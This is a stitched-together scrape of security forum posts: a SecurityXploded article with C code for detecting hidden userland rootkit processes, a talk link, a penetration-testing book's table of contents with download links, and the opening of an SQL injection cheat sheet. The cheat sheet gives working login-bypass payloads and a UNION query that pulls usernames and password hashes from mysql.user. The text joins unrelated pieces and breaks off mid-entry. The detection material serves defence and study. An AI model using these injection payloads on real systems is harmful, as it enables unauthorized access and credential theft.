Rootkits are one of the advanced species in today's ever-changing technical world. They are known for their sophisticated techniques to hide their presence, often evading detection by top-notch antivirus and detection tools. Antivirus solutions often hit the wall when it comes to rootkit detection, and there is a greater need for dedicated anti-rootkit tools. Rootkits use a combination of userland and kernel-level techniques to evade detection. In this article we will throw light on how userland rootkits work under the hood and on the different techniques which can be used to detect them. Though these methods are effective only against userland rootkits, in some cases they can even detect kernel-based rootkits if those have not taken proper care to remove all their traces.

Userland Rootkits & their Hidden Operations

Userland rootkits use different techniques to hide their process and to prevent its termination. One such method is to hook the NtOpenProcess function (the OpenProcess API internally calls NtOpenProcess) and return a failure whenever an anti-rootkit application tries to open that process. As a result the rootkit process remains hidden from any process viewer tool. This is just one of the methods; often you will find further internal functions, such as NtQuerySystemInformation, being hooked to filter the rootkit's process out of the list.

Hidden Userland Rootkit Process Detection Methods

Detection of a hidden process is equally challenging, as a rootkit can employ one or more methods to cover its presence. Here are some very effective methods to detect such userland rootkit processes. All these detection methods share a common approach. First they get the list of all running processes using standard API functions such as EnumProcesses or Process32First. Then one or more of the special methods described below are used to enumerate the processes again. Finally this new process list is compared with the previously obtained list, and any process found only in the new list is reported as a hidden rootkit process.

HPD using Direct NT System Call Implementation

This is a very effective method to detect any hidden userland rootkit process. One of the lesser-known ways of enumerating processes is to call NtQuerySystemInformation with SystemProcessesAndThreadsInformation as the first parameter. The drawback of this method is that it can be easily circumvented by hooking NtQuerySystemInformation and tampering with the results. The user-mode NtQuerySystemInformation is basically a stub of a few instructions that transitions from user to kernel land, where it finally reaches the kernel's NtQuerySystemInformation. So the trick here is to perform that transition ourselves, without calling the (possibly hooked) ntdll function. Here is sample code that shows how one can invoke NtQuerySystemInformation directly on various platforms. On Windows 2000, INT 2E is used to transition from user to kernel; from XP onwards the 'sysenter' instruction is used. Note that the system service number in EAX differs between Windows versions, which is why the code branches on the OS version.

__declspec(naked) NTSTATUS __stdcall DirectNTQuerySystemInformation(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength)
{
    // OSMajorVersion / OSMinorVersion are filled in beforehand
    // (for example from GetVersionEx) by the caller.

    // For Windows 2000: INT 2E, EDX points at the argument block
    if( OSMajorVersion == 5 && OSMinorVersion == 0 )
    {
        __asm
        {
            mov eax, 0x97
            lea edx, DWORD PTR ss:[esp+4]
            INT 0x2E
            ret 0x10
        }
    }

    // For Windows XP: sysenter, EDX = stack pointer at the call site
    if( OSMajorVersion == 5 && OSMinorVersion == 1 )
    {
        __asm
        {
            mov eax, 0xAD
            call SystemCall_XP
            ret 0x10
        SystemCall_XP:
            mov edx, esp
            sysenter
        }
    }

    // For Windows Vista & Longhorn
    if( OSMajorVersion == 6 && OSMinorVersion == 0 )
    {
        __asm
        {
            mov eax, 0xF8
            call SystemCall_VISTA
            ret 0x10
        SystemCall_VISTA:
            mov edx, esp
            sysenter
        }
    }

    // For Windows 7
    if( OSMajorVersion == 6 && OSMinorVersion == 1 )
    {
        __asm
        {
            mov eax, 0x105
            call SystemCall_WIN7
            ret 0x10
        SystemCall_WIN7:
            mov edx, esp
            sysenter
        }
    }
}

This technique can discover any userland rootkit process, and the only way for a rootkit process to defeat it is to move into the kernel. However, due to the low-level implementation, there is slight risk in using this method in production code.

HPD using PIDB (Process ID Bruteforce) method

This method was first used by BlackLight, and it turned out to be very effective yet simple. It enumerates process ids from 0 to 0x41DC and checks whether each process exists by calling OpenProcess. The list of discovered processes is then compared with the normal process list obtained through the standard enumeration functions (such as Process32First or EnumProcesses). During testing it was found that some process ids on server machines were higher than the magic number 0x41DC, so in order to be effective the magic number is doubled to cover all possible running processes on the latest operating systems. Here is sample code that implements the PIDB method:

HANDLE hprocess;
DWORD  dwExitCode;

// Process ids are multiples of 4, so step by 4
for(int i = 0; i < 0x83B8; i += 4)
{
    // These are the system idle and system processes
    if( i == 0 || i == 4 )
    {
        continue;
    }

    hprocess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, i);
    if( hprocess == NULL )
    {
        if( GetLastError() != ERROR_INVALID_PARAMETER )
        {
            // Any error other than ERROR_INVALID_PARAMETER means the
            // process exists but we are not able to open it.
            // Check whether it was already discovered through the
            // standard API functions.
            if( IsHiddenProcess(i) )
            {
                printf("\n Hidden process found %d", i);
            }
        }
        continue;
    }

    dwExitCode = 0;
    GetExitCodeProcess(hprocess, &dwExitCode);

    // Only an active process reports STILL_ACTIVE (259), which has the
    // same numeric value as ERROR_NO_MORE_ITEMS; a handle to an already
    // exited process can still be opened, so this filters those out.
    if( dwExitCode == ERROR_NO_MORE_ITEMS )
    {
        // check whether this process was already discovered
        if( IsHiddenProcess(i) )
        {
            printf("\n Hidden process found %d", i);
        }
    }

    CloseHandle(hprocess);
}

Though this is a very effective method, a rootkit can easily defeat it by hooking OpenProcess, or its native version NtOpenProcess, and returning NULL with the error code set to ERROR_INVALID_PARAMETER. To defend against such tricks, anti-rootkit software can call NtOpenProcess using the direct system call method shown in "HPD using Direct NT System Call Implementation".

HPD with CSRSS Process Handle Enumeration

Any Windows process, while running, holds a lot of open handles related to processes, threads, named objects, files, ports, registry keys, etc., and these can be used to detect hidden processes. One can use the native API to enumerate them. The effective way to enumerate handles is to call NtQuerySystemInformation with SystemHandleInformation as the first parameter. It lists the handles of all running processes in the system. For each enumerated handle it provides information such as the handle value, the handle type and the process id of the owning process. Hence, by enumerating all the handles and then using the associated process id, one can detect hidden processes that are not revealed through the standard API functions.

There is one interesting system process, CSRSS.EXE, which holds handles to all running processes. So instead of going through all the different handles, one can just look at the process handles of CSRSS.EXE. Interestingly, this method can detect not only userland hidden processes but also some rootkit processes that use kernel-land techniques without taking care to hide their process handles within CSRSS.EXE. Here is a code snippet which demonstrates this method:

HANDLE   hprocess, tprocess;
DWORD    targetPid;
NTSTATUS status;
ULONG    dwSize = 0x10000;
PVOID    bufHandleTable = malloc(dwSize);

// The handle table grows with the number of open handles; retry with a
// bigger buffer until the call stops reporting STATUS_INFO_LENGTH_MISMATCH.
status = NtQuerySystemInformation(SystemHandleInformation, bufHandleTable, dwSize, 0);
while( status == STATUS_INFO_LENGTH_MISMATCH )
{
    dwSize *= 2;
    bufHandleTable = realloc(bufHandleTable, dwSize);
    status = NtQuerySystemInformation(SystemHandleInformation, bufHandleTable, dwSize, 0);
}

SYSTEM_HANDLE_INFORMATION *HandleInfo = (SYSTEM_HANDLE_INFORMATION *) bufHandleTable;

// Process handles within CSRSS will not include the system idle process,
// the system process, smss.exe or csrss.exe itself.
for(int i = 0; i < HandleInfo->NumberOfHandles; i++)
{
    int pid = HandleInfo->Handles[i].UniqueProcessId;

    // For XP & 2K3          : HANDLE_TYPE_PROCESS = 0x5
    // For Vista & Longhorn  : HANDLE_TYPE_PROCESS = 0x6
    if( HandleInfo->Handles[i].ObjectTypeIndex == HANDLE_TYPE_PROCESS )
    {
        // check whether this process id is that of a CSRSS.EXE process
        if( IsCSRSSProcess(pid) )
        {
            hprocess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, pid);
            if( hprocess )
            {
                if( DuplicateHandle(hprocess, (HANDLE)HandleInfo->Handles[i].Handle,
                                    GetCurrentProcess(), &tprocess,
                                    PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, 0) )
                {
                    targetPid = GetProcessId(tprocess);

                    // check whether this is a hidden process
                    if( IsHiddenProcess(targetPid) )
                    {
                        printf("\n Found hidden process %d", targetPid);
                    }
                    CloseHandle(tprocess);
                }
                CloseHandle(hprocess);
            } // End of if( hprocess )
        } // End of if( IsCSRSSProcess(pid) )
    } // End of if
} // End of for-loop

free(bufHandleTable);

Since CSRSS.EXE is not the first process started when Windows boots, it does not contain handles to the processes started before it, such as the system idle process (pid 0), the system process (pid 4), smss.exe and CSRSS.EXE itself. On Windows Vista there can be more than one CSRSS.EXE process when multiple users are logged in. The same situation arises on XP when more than one user is operating through the 'Switch User' mechanism. In such cases one has to check whether the enumerated process belongs to any of these CSRSS process ids. The function IsCSRSSProcess() above does exactly that by comparing the discovered process id with the list of all running CSRSS.EXE processes.

One more way is to enumerate all thread handles within the CSRSS process instead of process handles, as most rootkits are aware of this technique. The CSRSS process has not only process handles but also thread handles for every running process. Once a thread handle is known, one can duplicate it and use the GetProcessIdOfThread function to get the process id associated with that thread.

Though any rootkit process can defeat this technique by hooking NtQuerySystemInformation or NtOpenProcess, that hooking can in turn be circumvented by using the direct implementation of these native API functions, as described in "HPD using Direct NT System Call Implementation".

Other Methods of Detecting Hidden Processes

There exist several other userland methods to detect hidden rootkit processes, but they are not as effective as the ones described above. However, they can be used on a need basis and often to target a specific rootkit. One such method is to enumerate all the open windows created by processes in the system using the EnumWindows API function and then call GetWindowThreadProcessId to get the process id associated with each window. Here is sample code that does the same:

// This is the callback function invoked for each top-level window
BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
    DWORD procId = 0;
    GetWindowThreadProcessId(hwnd, &procId);

    if( IsHiddenProcess(procId) )
    {
        printf("Found hidden process %d", procId);
    }
    return TRUE;   // keep enumerating
}

// Set up the callback function to enumerate through the windows
EnumWindows(EnumWindowsProc, 0);

There exist several other ways to detect hidden processes in userland, and new ways are being discovered every day. Though these detection techniques can be easily defeated from kernel land, they present a simple and less risky mechanism to uncover userland rootkits.

Source: Hidden Rootkit Process Detection - www.SecurityXploded.com
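The cross-view comparison that the PIDB and CSRSS sections of the article above rely on, written out as an added example in C (not the article's code): the Windows enumeration calls are replaced by a constructed handle table and process list so it runs offline, and the names process_type_index, csrss_view, find_hidden, pidb_is_alive and demo_* are this example's own assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>

/* Win32 values the PIDB decision keys on (real constants):
   ERROR_INVALID_PARAMETER = 87, STILL_ACTIVE = ERROR_NO_MORE_ITEMS = 259. */
#define ERR_INVALID_PARAMETER 87u
#define STILL_ACTIVE_CODE     259u

/* Constructed stand-in for the SYSTEM_HANDLE_TABLE_ENTRY_INFO fields the article
   reads. target_pid is what GetProcessId() would return after DuplicateHandle();
   here it comes from the constructed data instead of being resolved live. */
typedef struct {
    uint32_t owner_pid;   /* UniqueProcessId: process that holds the handle */
    uint8_t  type_index;  /* ObjectTypeIndex */
    uint32_t target_pid;  /* process the handle refers to (0 if not a process) */
} HandleEntry;

/* Process object type index, per the article: 0x5 on XP/2003, 0x6 on Vista. */
uint8_t process_type_index(int os_major) { return os_major >= 6 ? 0x6 : 0x5; }

/* PIDB decision for one pid, given the results of OpenProcess(),
   GetLastError() and GetExitCodeProcess() as the article's loop uses them. */
int pidb_is_alive(int open_ok, uint32_t last_error, uint32_t exit_code) {
    if (!open_ok)
        return last_error != ERR_INVALID_PARAMETER; /* exists; e.g. access denied */
    return exit_code == STILL_ACTIVE_CODE;          /* otherwise an exited process */
}

static int in_list(uint32_t pid, const uint32_t *list, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (list[i] == pid) return 1;
    return 0;
}

/* Low-level view: targets of process-type handles owned by any CSRSS instance
   (several exist with Fast User Switching / multiple sessions). Deduplicated. */
size_t csrss_view(const HandleEntry *tab, size_t n, const uint32_t *csrss,
                  size_t ncsrss, int os_major, uint32_t *out, size_t cap) {
    size_t count = 0;
    uint8_t ptype = process_type_index(os_major);
    for (size_t i = 0; i < n; i++) {
        if (tab[i].type_index != ptype) continue;                /* not a process */
        if (!in_list(tab[i].owner_pid, csrss, ncsrss)) continue; /* not csrss's */
        if (in_list(tab[i].target_pid, out, count)) continue;    /* already seen */
        if (count < cap) out[count++] = tab[i].target_pid;
    }
    return count;
}

/* Cross-view diff: anything in the low-level view that the standard
   (EnumProcesses/Process32First) view does not report is flagged as hidden. */
size_t find_hidden(const uint32_t *standard, size_t ns, const uint32_t *lowlevel,
                   size_t nl, uint32_t *out, size_t cap) {
    size_t count = 0;
    for (size_t i = 0; i < nl; i++)
        if (!in_list(lowlevel[i], standard, ns) && count < cap)
            out[count++] = lowlevel[i];
    return count;
}

/* Constructed scenario (XP-style type index 0x5): pid 1337 is held by csrss but
   is missing from the standard listing, as a hooked NtQuerySystemInformation
   would arrange. All pids and handle entries below are made up for this demo. */
static const uint32_t kStandardView[] = { 0, 4, 368, 420, 600, 1024 };
static const uint32_t kCsrssPids[]    = { 420 };
static const HandleEntry kHandleTable[] = {
    { 420, 0x05, 600  },  /* csrss -> visible process */
    { 420, 0x05, 1024 },  /* csrss -> visible process */
    { 420, 0x05, 1337 },  /* csrss -> process absent from kStandardView */
    { 420, 0x1c, 0    },  /* some non-process object type, ignored */
    { 600, 0x05, 1024 },  /* process handle, but its owner is not csrss */
    { 420, 0x05, 1024 },  /* duplicate handle to an already-seen process */
};
#define COUNT(a) (sizeof(a) / sizeof((a)[0]))

/* Runs the scenario; returns the number of hidden pids, first one via *first. */
size_t demo_hidden(uint32_t *first) {
    uint32_t low[16], hidden[16];
    size_t nl = csrss_view(kHandleTable, COUNT(kHandleTable),
                           kCsrssPids, COUNT(kCsrssPids), 5, low, 16);
    size_t nh = find_hidden(kStandardView, COUNT(kStandardView), low, nl, hidden, 16);
    if (first) *first = nh ? hidden[0] : 0;
    return nh;
}

uint32_t demo_first_hidden_pid(void) { uint32_t p = 0; demo_hidden(&p); return p; }

int main(void) {
    uint32_t pid = 0;
    size_t n = demo_hidden(&pid);
    printf("hidden processes: %zu (first pid %u)\n", n, (unsigned)pid);
    printf("pidb: access denied -> alive=%d, exited -> alive=%d\n",
           pidb_is_alive(0, 5, 0), pidb_is_alive(1, 0, 0));
    return 0;
}
```

On a real system the two views would be filled from Process32First and from the CSRSS handle table, and a rootkit hooking the standard path shows up exactly as the constructed pid 1337 does here.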
  20. [h=3]Attacking and Exploiting Wireless Drivers[/h]

Here is the video recording of a talk on attacking and exploiting wireless drivers in various clients. This presentation was delivered by Sylvester Keil and Clemens Kolbitsch at the DeepSec conference.

Source: SecurityXploded Forum • View topic - Attacking and Exploiting Wireless Drivers
  21. Professional Penetration Testing: Creating and Operating a Formal Hacking Lab

Thomas Wilhelm
Technical Editor: Jan Kanclirz Jr.
Pages: 525

Acknowledgments
Foreword

PART 1 SETTING UP

CHAPTER 1 Introduction
  Introduction
  About the Book
    Target Audience
    How to Use This Book
  About the DVD
    Course Material
    Reference Material
    LiveCDs
  Summary
  Solutions Fast Track
    About the Book
    About the DVD
  Reference

CHAPTER 2 Ethics and Hacking
  Introduction
  Why Stay Ethical?
    Black Hat Hackers
    White Hat Hackers
    Gray Hat Hackers
  Ethical Standards
    Certifications
    Contractor
    Employer
    Educational and Institutional Organizations
  Computer Crime Laws
    Types of Laws
    Type of Computer Crimes and Attacks
    International Laws
    Safe Harbor and Directive 95/46/EC
  Getting Permission to Hack
    Confidentiality Agreement
    Company Obligations
    Contractor Obligations
    Auditing and Monitoring
    Conflict Management
  Summary
  Solutions Fast Track
    Why Stay Ethical?
    Ethical Standards
    Computer Crime Laws
    Getting Permission to Hack
  Frequently Asked Questions
  Expand Your Skills
  References

CHAPTER 3 Hacking as a Career
  Introduction
  Career Paths
    Network Architecture
    System Administration
    Applications and Databases
  Certifications
    High-Level Certifications
    Skill- and Vendor-Specific Certifications
  Associations and Organizations
    Professional Organizations
    Conferences
    Local Communities
    Mailing Lists
  Summary
  Solutions Fast Track
    Career Paths
    Certifications
    Associations and Organizations
  Frequently Asked Questions
  Expand Your Skills

CHAPTER 4 Setting Up Your Lab
  Introduction
  Personal Lab
    Keeping it Simple
    Equipment
    Software
    Lab for Book Exercises
  Corporate Lab
    Internal Labs
    External Labs
    Equipment
    Software
  Protecting Penetration Test Data
    Encryption Schemas
    Securing PenTest Systems
    Mobile Security Concerns
    Wireless Lab Data
  Additional Network Hardware
    Routers
    Firewalls
    Intrusion Detection System/Intrusion Prevention System
  Summary
  Solutions Fast Track
    Personal Lab
    Corporate Lab
    Protecting Penetration Test Data
    Additional Network Hardware
  Frequently Asked Questions
  Expand Your Skills
  Reference

CHAPTER 5 Creating and Using PenTest Targets in Your Lab
  Introduction
  Turn-Key Scenarios versus Real-World Targets
    Problems with Learning to Hack
    Real-World Scenarios
  Turn-Key Scenarios
    What is a LiveCD?
    De-ICE
    Hackerdemia
    pWnOS
    Foundstone
    Open Web Application Security Project
  Using Exploitable Targets
    Operating Systems
    Applications
  Analyzing Malware – Viruses and Worms
    Setting up a Lab
  Other Target Ideas
    CTF Events
    Web-Based Challenges
    Vulnerability Announcements
  Summary
  Solutions Fast Track
    Turn-Key Scenarios versus Real-World Targets
    Turn-Key Scenarios
    Using Exploitable Targets
    Analyzing Malware – Viruses and Worms
    Other Target Ideas
  Frequently Asked Questions
  Expand Your Skills
  References

CHAPTER 6 Methodologies
  Introduction
  Project Management Body of Knowledge
    Introduction to PMBOK
    Initiating Process Group
    Planning Process Group
    Executing Process Group
    Closing Process Group
    Monitoring and Controlling Process Group
  Information System Security Assessment Framework
    Planning and Preparation – Phase I
    Assessment – Phase II
    Reporting, Clean-up, and Destroy Artifacts – Phase III
  Open Source Security Testing Methodology Manual
    Rules of Engagement
    Channels
    Modules
175 Summary ........................................................................ 176 viii Contents Solutions Fast Track ......................................................... 177 Project Management Body of Knowledge ........................ 177 Information System Security Assessment Framework ........ 177 Open Source Security Testing Methodology Manual .......... 178 Frequently Asked Questions .............................................. 178 Expand Your Skills .......................................................... 179 References ...................................................................... 179 CHAPTER 7 PenTest Metrics ................................................................ 181 Introduction .................................................................... 181 Quantitative, Qualitative, and Mixed Methods ...................... 182 Quantitative Analysis .................................................... 182 Qualitative Analysis ...................................................... 183 Mixed Method Analysis ................................................. 185 Current Methodologies ..................................................... 186 Project Management Institute ........................................ 186 ISSAF ......................................................................... 191 OSSTMM .................................................................... 192 Tool-Generated Reports ................................................ 193 Summary ........................................................................ 194 Solutions Fast Track ......................................................... 195 Quantitative, Qualitative, and Mixed Methods .................. 195 Current Methodologies ................................................. 195 Frequently Asked Questions .............................................. 196 References ...................................................................... 
196 CHAPTER 8 Management of a PenTest ................................................... 197 Introduction .................................................................... 197 Project Team Members ..................................................... 197 Roles and Responsibilities ............................................. 198 Organizational Structure ............................................... 202 Project Management ......................................................... 206 Initiating Stage ............................................................ 206 Planning Stage ............................................................ 208 Executing Stage ........................................................... 209 Monitoring and Controlling ........................................... 211 Closing Stage .............................................................. 211 Summary ........................................................................ 214 Solutions Fast Track ......................................................... 214 Project Team Members ................................................. 214 Project Management ..................................................... 214 Frequently Asked Questions .............................................. 215 Expand Your Skills .......................................................... 215 References ...................................................................... 216 PART 2 RUNNING A PENTEST CHAPTER 9 Information Gathering ......................................................... 219 Introduction .................................................................... 219 Passive Information Gathering ........................................... 221 Web Presence ............................................................. 222 Corporate Data ............................................................ 231 WHOIS and DNS Enumeration ...................................... 
233 Additional Internet Resources ........................................ 236 Active Information Gathering ............................................ 238 DNS Interrogation ....................................................... 238 E-mail Accounts ........................................................... 240 Perimeter Network Identification ................................... 242 Network Surveying ...................................................... 246 Project Management ......................................................... 247 Executing Process Phase ............................................... 248 Monitoring and Control Process ..................................... 250 Summary ........................................................................ 253 Solutions Fast Track ......................................................... 253 Passive Information Gathering ....................................... 253 Active Information Gathering ........................................ 254 Project Management ..................................................... 254 Frequently Asked Questions .............................................. 254 Expand Your Skills .......................................................... 255 References ...................................................................... 257 CHAPTER 10 Vulnerability Identification ................................................... 259 Introduction .................................................................... 259 Port Scanning .................................................................. 260 Target Verification ....................................................... 261 UDP Scanning ............................................................. 264 TCP Scanning .............................................................. 265 Perimeter Avoidance Scanning ....................................... 268 System Identification ........................................................ 
272 Active OS Fingerprinting .............................................. 272 Passive OS Fingerprinting ............................................. 272 x Contents Services Identification ...................................................... 275 Banner Grabbing ......................................................... 276 Enumerating Unknown Services .................................... 277 Vulnerability Identification ................................................ 278 Summary ........................................................................ 281 Solutions Fast Track ......................................................... 281 Port Scanning .............................................................. 281 System Identification .................................................... 282 Services Identification .................................................. 282 Vulnerability Identification ............................................ 282 Frequently Asked Questions .............................................. 282 Expand Your Skills .......................................................... 283 Reference ....................................................................... 284 CHAPTER 11 Vulnerability Verification ..................................................... 285 Introduction .................................................................... 285 Exploit Codes – Finding and Running ................................. 287 Internet Sites ............................................................... 287 Automated Tools ......................................................... 290 Exploit Codes – Creating Your Own ................................... 320 Fuzzing ...................................................................... 322 Code Review ............................................................... 324 Application Reversing .................................................. 
324 Web Hacking .................................................................. 325 SQL Injection .............................................................. 326 Cross-Site Scripting ...................................................... 327 Web Application Vulnerabilities ..................................... 330 Project Management ......................................................... 332 Executing Process Phase ............................................... 332 Monitoring and Control Process ..................................... 333 Summary ........................................................................ 334 Solutions Fast Track ......................................................... 335 Exploit Codes – Finding and Running ............................. 335 Exploit Codes – Creating Your Own ............................... 335 Web Hacking .............................................................. 335 Project Management ..................................................... 335 Frequently Asked Questions .............................................. 336 Expand Your Skills .......................................................... 336 References ...................................................................... 338 CHAPTER 12 Compromising a System and Privilege Escalation ..................... 339 Introduction .................................................................... 339 System Enumeration ........................................................ 341 Internal Vulnerabilities ................................................. 341 Sensitive Data ............................................................. 347 Network Packet Sniffing ................................................... 348 Social Engineering ........................................................... 354 Baiting ....................................................................... 355 Phishing ..................................................................... 
355 Pretexting ................................................................... 355 Wireless Attacks .............................................................. 356 Wi-Fi Protected Access Attack ........................................ 357 WEP Attack ................................................................. 362 Project Management ......................................................... 364 Executing Process Phase ............................................... 364 Monitoring and Control Process ..................................... 365 Summary ........................................................................ 365 Solutions Fast Track ......................................................... 366 System Enumeration .................................................... 366 Network Packet Sniffing ............................................... 367 Social Engineering ....................................................... 367 Wireless Attacks .......................................................... 367 Project Management ..................................................... 367 Frequently Asked Questions .............................................. 368 Expand Your Skills .......................................................... 368 References ...................................................................... 369 CHAPTER 13 Maintaining Access ........................................................... 371 Introduction .................................................................... 371 Shells and Reverse Shells .................................................. 372 Netcat Shell ................................................................ 372 Netcat Reverse Shell ..................................................... 376 Encrypted Tunnels ........................................................... 379 Adding a Host Firewall (Optional) ................................. 
380 Setting Up the SSH Reverse Shell ................................... 381 Other Encryption and Tunnel Methods ............................... 386 Summary ........................................................................ 387 Solutions Fast Track ......................................................... 388 Shells and Reverse Shells .............................................. 388 Encrypted Tunnels ....................................................... 388 Other Encryption and Tunnel Methods ........................... 388 xii Contents Frequently Asked Questions .............................................. 389 Expand Your Skills .......................................................... 389 Reference ....................................................................... 390 CHAPTER 14 Covering Your Tracks ......................................................... 391 Introduction .................................................................... 391 Manipulating Log Data ..................................................... 392 User Login .................................................................. 392 Application Logs .......................................................... 396 Hiding Files .................................................................... 397 Hiding Files in Plain Sight ............................................ 398 Hiding Files Using the File System ................................. 399 Hiding Files in Windows .............................................. 402 Summary ........................................................................ 404 Solutions Fast Track ......................................................... 405 Manipulating Log Data ................................................. 405 Hiding Files ................................................................ 405 Frequently Asked Questions .............................................. 
405 Expand Your Skills .......................................................... 406 Reference ....................................................................... 406 PART 3 WRAPPING EVERYTHING UP CHAPTER 15 Reporting Results .............................................................. 409 Introduction .................................................................... 409 What Should You Report? ................................................. 410 Out of Scope Issues ..................................................... 410 Findings ..................................................................... 411 Solutions .................................................................... 412 Manuscript Preparation ................................................ 412 Initial Report ................................................................... 414 Peer Reviews .............................................................. 415 Fact Checking ............................................................. 415 Metrics ....................................................................... 416 Final Report .................................................................... 425 Peer Reviews .............................................................. 425 Documentation ............................................................ 426 Summary ........................................................................ 437 Solutions Fast Track ......................................................... 438 What Should You Report? ............................................. 438 Initial Report ............................................................... 438 Final Report ................................................................ 438 Frequently Asked Questions .............................................. 439 Expand Your Skills .......................................................... 
439 References ...................................................................... 441 CHAPTER 16 Archiving Data .................................................................. 443 Introduction .................................................................... 443 Should You Keep Data? .................................................... 443 Legal Issues ................................................................ 444 E-mail ........................................................................ 446 Findings and Reports ................................................... 446 Securing Documentation ................................................... 447 Access Controls ........................................................... 448 Archival Methods ......................................................... 448 Archival Locations ....................................................... 449 Destruction Policies ..................................................... 450 Summary ........................................................................ 450 Solutions Fast Track ......................................................... 451 Should You Keep Data? ................................................ 451 Securing Documentation ............................................... 451 Frequently Asked Questions .............................................. 451 Reference ....................................................................... 452 CHAPTER 17 Cleaning Up Your Lab ........................................................ 453 Introduction .................................................................... 453 Archiving Lab Data .......................................................... 454 Proof of Concepts ........................................................ 454 Malware Analysis ......................................................... 455 Creating and Using System Images ..................................... 
455 License Issues ............................................................. 455 Virtual Machines .......................................................... 456 “Ghost” Images ........................................................... 456 Creating a “Clean Shop” ................................................... 457 Sanitization Methods .................................................... 458 Using Hashes .............................................................. 461 Change Management Controls ....................................... 461 Summary ........................................................................ 462 Solutions Fast Track ......................................................... 462 Archiving Lab Data ...................................................... 462 Creating and Using System Images ................................. 463 Creating a “Clean Shop” ............................................... 463 Frequently Asked Questions .............................................. 463 Reference ....................................................................... 463 xiv Contents CHAPTER 18 Planning for Your Next PenTest ............................................ 465 Introduction .................................................................... 465 Risk Management Register ................................................ 466 Creating a Risk Management Register ............................. 466 Prioritization of Risks and Responses ............................. 467 Knowledge Database ........................................................ 468 Creating a Knowledge Database ..................................... 468 Sanitization of Findings ................................................ 469 Project Management Knowledge Database ....................... 469 After-Action Review ......................................................... 470 Project Assessments ..................................................... 
470 Team Assessments ....................................................... 471 Training Proposals ....................................................... 471 Summary ........................................................................ 473 Solutions Fast Track ......................................................... 473 Risk Management Register ............................................ 473 Knowledge Database .................................................... 474 After-Action Review ..................................................... 474 Frequently Asked Questions .............................................. 474 Expand Your Skills .......................................................... 475 Reference ....................................................................... 476 Appendix A: Acronyms ............................................................................. 477 Appendix B: Definitions ........................................................................... 489 Index .................................................................................................. 495 Download: http://rogunix.com/docs/Pentesting/Professional%20Penetration%20Testing:%20Creating%20and%20Operating%20a%20Formal%20Hacking%20Lab.pdf Mirror: http://www.megaupload.com/?d=Z7YUTFMR
  22. [h=3]SQL Injection Pocket Reference 2010 Cheat Sheet [sqlI][/h] QL Injection Pocket Reference 2010 Great paper made by Reiners, .mario and lightos from sla.ckers.org 1. MySQL 1. Default Databases 2. Comment Out Query 3. Testing Injection 1. Strings 2. Numeric 3. In a login 4. Testing Version 5. MySQL-specific code 6. Retrieving DB usernames/passwords 7. Tables & Columns 1. Finding out column # 2. Retrieving Tables 3. Retrieving Columns 4. PROCEDURE ANALYSE() 5. Find Tables from Column Name 6. Find Column From Table Name 8. Avoiding the use of single/double quotations 9. String concatenation 10. Privileges 11. FILE privilege 1. MySQL 4/5 2. MySQL 5 12. Out Of Band Channeling 1. Timing 2. DNS (requires FILE privilege) 3. SMB (requires FILE privilege) 13. Reading Files (requires FILE privilege) 14. Writing Files (requires FILE privilege) 15. Stacked Queries with PDO 16. User Defined Functions 17. Fuzzing and Obfuscation 1. Allowed Intermediary Characters: 2. Allowed Intermediary Characters after AND/OR 18. Operators 19. Constants 20. MySQL Functions() 21. MySQL Password Hashing (Taken from MySQL website) 22. MySQL Password() Cracker 23. MySQL < 4.1 Password Cracker 2. MSSQL 1. Default Databases 2. Comment Out Query 3. Testing Version 4. Retrieving user names/passwords 5. Database Server Hostname 6. Listing Databases 7. Tables & Columns 1. Retrieving Tables 2. Retrieving Columns 3. Retrieving Multiple Tables/Columns at once 8. OPENROWSET Attacks 9. System Command Execution 10. SP_PASSWORD (Hiding Query) 11. Fuzzing and Obfuscation 1. Encodings 12. MSSQL Password Hashing 13. MSSQL Password Cracker 3. ORACLE 1. Default Databases 2. Comment Out Query 3. Testing Version 4. Retrieving Users/Passwords 5. Retrieving Databases 1. Current Database 2. User Databases 6. Tables & Columns 1. Retrieving Tables 2. Retrieving Columns 3. Finding Tables from Column Name 4. Finding Column From Table Name 7. Fuzzing and Obfuscation 1. Avoiding the use of single/double quotations 2. 
Unlike other RDBMS, Oracle allows us to reference table/column names encoded. 8. Out Of Band Channeling 1. Time Delay 2. Heavy Query Time delays Credits I would like to thank .mario, Reiners and everyone else who help me put this together. You can reach me at twitter.com/LightOS for any suggestions you may have or if there's something you think should be on here. Remember this is still a work in progress. MySQL Default Databases * mysql (Privileged) * information_schema (Version >= 5) Comment Out Query * # * /* * -- - * ; Example: ' OR 1=1 -- -' ORDER BY id; Testing Injection * False o The query is invalid (MySQL errors/missing content on website) * True o The query is valid (Content is displayed as usual) Strings * ' - False * '' - True * " - False * "" - True Numeric * AND 0 - False * AND 1 - True * 2-1 - 1 * 3-2 - 1 In a login * ' OR '1 * ' OR 1 -- - * '=' * 'like' * '=0-- - Example: * SELECT * FROM Users WHERE username = 'Mike' AND password = ''='' * " OR "" = " * " OR 1 = 1 -- - Example: SELECT * FROM Users WHERE username = 'Mike' AND password = 'anypassword' OR '' = '' Note: * You can use as many apostrophes/quotations as you want as long as they pair up * SELECT * FROM Articles WHERE id = '121'''''''''''''' - This is valid * It's also possible to continue the statement after the chain of quotes: SELECT '1'''''''"" UNION SELECT 2 # 1 and 2 * Quotes escape quotes: SELECT '1''' # 1' Testing Version * VERSION(); * @@VERSION; Example: ' AND MID(VERSION(),1,1) = '5 - True if MySQL version is 5 MySQL-specific code MySQL allows you to specify the version number after the exclamation mark. The syntax within the comment is only executed if the version is greater or equal to the specified version number. 
Example: UNION SELECT /*!50000 5,null;x%A0*//*!40000 4,null-- ,*//*!30000 3,null-- x*/,null-- - (UNION with 2 columns)

Note:
* You can use comments in between the name and the parenthesis
* Example: VERSION/**/()
* Output will contain -nt-log in case the DBMS runs on a Windows based machine

Retrieving DB usernames/passwords
* Database.Table: mysql.user (Privileged)
* Columns: user, password
* Current User: user(), system_user()

Example:
* UNION SELECT CONCAT(user, 0x3A, password) FROM mysql.user WHERE user = 'root'

Tables & Columns

Finding out column #
* Order By:
  o ORDER BY 1
  o ORDER BY 2
  o ORDER BY ...
Note: Keep incrementing the number until you get a False response.
Example:
